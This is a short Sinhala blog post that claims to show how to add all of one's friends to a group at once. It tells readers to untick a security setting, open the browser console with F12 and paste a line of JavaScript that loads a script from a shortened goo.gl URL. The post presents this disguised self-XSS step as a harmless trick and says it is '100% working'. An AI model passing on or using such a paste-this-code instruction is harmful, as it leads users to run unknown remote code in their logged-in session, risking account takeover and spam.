මෙන්න වැඩේ සිම්පල් වැඩක් හිතන තරම් අමාරු නැ,
තමන්ගේ හැම ෆ්‍රෙන්ඩ් කෙනෙක්ම තමන්ගේ ගෘප් එකට එනවා මේ පොඩි දේ කරානම්,
ඔය ලොකු ලොකු ගෘප් එකපාරටම හදන ක්‍රමය තමා අද මන් මේ කියාදෙන්නේ,
අපිට මේ වැඩේ කරන්න ඕන නම් සාමාන්‍ය විදියට කරන්න බැ, http:// අයින් කරලා තමා ගෘප් එකට යන්න ඕන.
ඒවැඩේ කරන්න එච්චර අමාරු නැ.
මුලින්ම අපි එක කරමු.
Account setting > security
ඔන්න ඔකේ තීන ටික් එක අයින් කරලා දන්නා වැඩේ ඉවරයි,
ඊට පස්සේ තමන්ට ෆ්‍රෙන්ඩ් ලා ඇඩ් කරගන්න ඕන ගෘප් එකට ගිහින් F12 ගහන්න,
ඒතකොට එන එකෙන් කොන්සල් එක තෝරලා මේ කෝඩ් එක පේස්ට් කරන්න.
ඔන්න ඒහෙන්ම් කෝඩ් එක
document.body.appendChild(document.createElement('script')).src='http://goo.gl/gMN2z';
මේක ctrl+v ගහලා පේස්ට් කරලා,enter ගහන්න වැඩේ ඉවරයි,එට පස්සේ දඩ බඩ ගල ෆ්‍රෙන්ඩ් ඇඩ් වෙන්න ගනී,
එක ඉවර උනාට පස්සේ http:// එක ඔෆ් කරලා දන්න,දැන් අව්ලක් නැ.
එට පස්සේ ඔයාට පෙනෙයි, ෆ්‍රෙන්ඩ් ල ඇඩ් වෙලා තිනවා කියල,
100% working
මම නම් කරා,
ගින්දර වගේ හරි ගියා,මම නම් කරේ chrome එකේ,අනිත් ඒවත් මෙහෙම්මම තමා,
හොද නම් අදහසක් දාලා යන්නකෝ.....
No comments:
Post a Comment